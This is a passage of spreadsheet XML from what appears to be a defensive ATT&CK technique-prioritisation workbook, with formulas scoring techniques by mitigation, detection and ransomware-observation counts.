        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M526" s="25">
        <v>0</v>
      </c>
      <c r="N526" s="51">
        <v>0</v>
      </c>
      <c r="O526" s="51">
        <v>0</v>
      </c>
      <c r="P526" s="51">
        <v>0</v>
      </c>
      <c r="Q526" s="51">
        <v>0</v>
      </c>
      <c r="R526" s="51"/>
      <c r="S526" s="51">
        <v>0</v>
      </c>
      <c r="T526" s="51"/>
      <c r="U526" s="51">
        <v>0</v>
      </c>
      <c r="V526" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W526">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X526">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y526">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z526">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA526">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB526">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC526" s="29"/>
      <c r="AD526" s="25" t="str" cm="1">
        <f t="array" ref="AD526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE526" s="25">
        <f>IF(AD526="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF526" s="25" t="str" cm="1">
        <f t="array" ref="AF526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG526" s="25">
        <f>IF(AF526="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH526" s="25" t="str" cm="1">
        <f t="array" ref="AH526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI526" s="25">
        <f>IF(AH526="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ526" s="25" t="str" cm="1">
        <f t="array" ref="AJ526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK526" s="25">
        <f>IF(AJ526="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL526" s="25" t="str" cm="1">
        <f t="array" ref="AL526">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC526)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM526" s="25">
        <f>IF(AL526="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN526" s="52">
        <v>2</v>
      </c>
      <c r="AO526" s="51">
        <v>1</v>
      </c>
      <c r="AP526" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.166666666666667E-2</v>
      </c>
      <c r="AQ526" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR526" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS526" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT526" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU52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27" spans="1:47">
      <c r="A527" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8993333333333331E-2</v>
      </c>
      <c r="B527" s="25">
        <f>SUM(H527,M527,V527)*(1+SUM(AE527,AG527,AI527,AK527,AM527))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C527" s="25" t="s">
        <v>1866</v>
      </c>
      <c r="D527" s="25" t="s">
        <v>1867</v>
      </c>
      <c r="E527" s="25" t="s">
        <v>1868</v>
      </c>
      <c r="F527" s="51">
        <v>0</v>
      </c>
      <c r="G527" s="51">
        <v>1</v>
      </c>
      <c r="H527" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I527">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J527">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K527">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L527">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M527" s="25">
        <v>0</v>
      </c>
      <c r="N527" s="51">
        <v>0</v>
      </c>
      <c r="O527" s="51">
        <v>0</v>
      </c>
      <c r="P527" s="51">
        <v>0</v>
      </c>
      <c r="Q527" s="51">
        <v>0</v>
      </c>
      <c r="R527" s="51"/>
      <c r="S527" s="51">
        <v>0</v>
      </c>
      <c r="T527" s="51"/>
      <c r="U527" s="51">
        <v>0</v>
      </c>
      <c r="V527" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W527">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X527">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y527">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z527">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA527">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB527">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC527" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD527" s="25" t="str" cm="1">
        <f t="array" ref="AD527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE527" s="25">
        <f>IF(AD527="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF527" s="25" t="str" cm="1">
        <f t="array" ref="AF527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG527" s="25">
        <f>IF(AF527="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH527" s="25" t="str" cm="1">
        <f t="array" ref="AH527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC527)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI527" s="25">
        <f>IF(AH527="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ527" s="25" t="str" cm="1">
        <f t="array" ref="AJ527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK527" s="25">
        <f>IF(AJ527="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL527" s="25" t="str" cm="1">
        <f t="array" ref="AL527">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC527)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM527" s="25">
        <f>IF(AL527="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN527" s="60">
        <v>1</v>
      </c>
      <c r="AO527" s="51">
        <v>1</v>
      </c>
      <c r="AP527" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8993333333333331E-2</v>
      </c>
      <c r="AQ527" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR527" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS527" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT527" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU52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28" spans="1:47">
      <c r="A528" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B528" s="25">
        <f>SUM(H528,M528,V528)*(1+SUM(AE528,AG528,AI528,AK528,AM528))</f>
        <v>0.05</v>
      </c>
      <c r="C528" s="25" t="s">
        <v>1869</v>
      </c>
      <c r="D528" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E528" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F528" s="51">
        <v>0</v>
      </c>
      <c r="G528" s="51">
        <v>1</v>
      </c>
      <c r="H528" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I528">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J528">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K528">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L528">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M528" s="25">
        <v>0</v>
      </c>
      <c r="N528" s="51">
        <v>0</v>
      </c>
      <c r="O528" s="51">
        <v>0</v>
      </c>
      <c r="P528" s="51">
        <v>0</v>
      </c>
      <c r="Q528" s="51">
        <v>0</v>
      </c>
      <c r="R528" s="51"/>
      <c r="S528" s="51">
        <v>0</v>
      </c>
      <c r="T528" s="51"/>
      <c r="U528" s="51">
        <v>0</v>
      </c>
      <c r="V528" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W528">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X528">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y528">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z528">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA528">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB528">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC528" s="29"/>
      <c r="AD528" s="25" t="str" cm="1">
        <f t="array" ref="AD528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE528" s="25">
        <f>IF(AD528="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF528" s="25" t="str" cm="1">
        <f t="array" ref="AF528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG528" s="25">
        <f>IF(AF528="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH528" s="25" t="str" cm="1">
        <f t="array" ref="AH528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI528" s="25">
        <f>IF(AH528="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ528" s="25" t="str" cm="1">
        <f t="array" ref="AJ528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK528" s="25">
        <f>IF(AJ528="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL528" s="25" t="str" cm="1">
        <f t="array" ref="AL528">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC528)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM528" s="25">
        <f>IF(AL528="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN528" s="52">
        <v>1</v>
      </c>
      <c r="AO528" s="51">
        <v>1</v>
      </c>
      <c r="AP528" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ528" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR528" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS528" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT528" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU52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29" spans="1:47">
      <c r="A529" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B529" s="25">
        <f>SUM(H529,M529,V529)*(1+SUM(AE529,AG529,AI529,AK529,AM529))</f>
        <v>0.05</v>
      </c>
      <c r="C529" s="25" t="s">
        <v>1871</v>
      </c>
      <c r="D529" s="25" t="s">
        <v>1626</v>
      </c>
      <c r="E529" s="25" t="s">
        <v>1865</v>
      </c>
      <c r="F529" s="51">
        <v>0</v>
      </c>
      <c r="G529" s="51">
        <v>1</v>
      </c>
      <c r="H529" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I529">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J529">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K529">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L529">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M529" s="25">
        <v>0</v>
      </c>
      <c r="N529" s="51">
        <v>0</v>
      </c>
      <c r="O529" s="51">
        <v>0</v>
      </c>
      <c r="P529" s="51">
        <v>0</v>
      </c>
      <c r="Q529" s="51">
        <v>0</v>
      </c>
      <c r="R529" s="51"/>
      <c r="S529" s="51">
        <v>0</v>
      </c>
      <c r="T529" s="51"/>
      <c r="U529" s="51">
        <v>0</v>
      </c>
      <c r="V529" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W529">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X529">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y529">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z529">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA529">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB529">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC529" s="29"/>
      <c r="AD529" s="25" t="str" cm="1">
        <f t="array" ref="AD529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE529" s="25">
        <f>IF(AD529="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF529" s="25" t="str" cm="1">
        <f t="array" ref="AF529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG529" s="25">
        <f>IF(AF529="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH529" s="25" t="str" cm="1">
        <f t="array" ref="AH529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI529" s="25">
        <f>IF(AH529="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ529" s="25" t="str" cm="1">
        <f t="array" ref="AJ529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK529" s="25">
        <f>IF(AJ529="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL529" s="25" t="str" cm="1">
        <f t="array" ref="AL529">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC529)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM529" s="25">
        <f>IF(AL529="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN529" s="52">
        <v>1</v>
      </c>
      <c r="AO529" s="51">
        <v>1</v>
      </c>
      <c r="AP529" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ529" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR529" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS529" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT529" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU52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30" spans="1:47">
      <c r="A530" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B530" s="25">
        <f>SUM(H530,M530,V530)*(1+SUM(AE530,AG530,AI530,AK530,AM530))</f>
        <v>0.05</v>
      </c>
      <c r="C530" s="25" t="s">
        <v>1872</v>
      </c>
      <c r="D530" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E530" s="25" t="s">
        <v>1873</v>
      </c>
      <c r="F530" s="51">
        <v>0</v>
      </c>
      <c r="G530" s="51">
        <v>1</v>
      </c>
      <c r="H530" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I530">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J530">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K530">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L530">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M530" s="25">
        <v>0</v>
      </c>
      <c r="N530" s="51">
        <v>0</v>
      </c>
      <c r="O530" s="51">
        <v>0</v>
      </c>
      <c r="P530" s="51">
        <v>0</v>
      </c>
      <c r="Q530" s="51">
        <v>0</v>
      </c>
      <c r="R530" s="51"/>
      <c r="S530" s="51">
        <v>0</v>
      </c>
      <c r="T530" s="51"/>
      <c r="U530" s="51">
        <v>0</v>
      </c>
      <c r="V530" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W530">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X530">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y530">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z530">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA530">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB530">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC530" s="29"/>
      <c r="AD530" s="25" t="str" cm="1">
        <f t="array" ref="AD530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE530" s="25">
        <f>IF(AD530="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF530" s="25" t="str" cm="1">
        <f t="array" ref="AF530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG530" s="25">
